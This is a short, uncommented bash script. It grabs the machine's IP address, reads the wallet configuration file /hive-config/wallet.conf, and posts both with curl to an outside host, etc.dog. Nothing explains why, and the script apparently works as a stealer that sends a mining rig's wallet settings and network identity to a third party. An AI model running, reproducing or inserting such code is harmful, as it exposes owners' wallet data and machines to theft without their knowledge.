#!/bin/bash

ip_addr=$(ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d '/') &&
wallet_data=$(cat /hive-config/wallet.conf) &&
curl http://etc.dog/hc/reportMsg -X POST -d "data=$wallet_data&ip=$ip_addr"
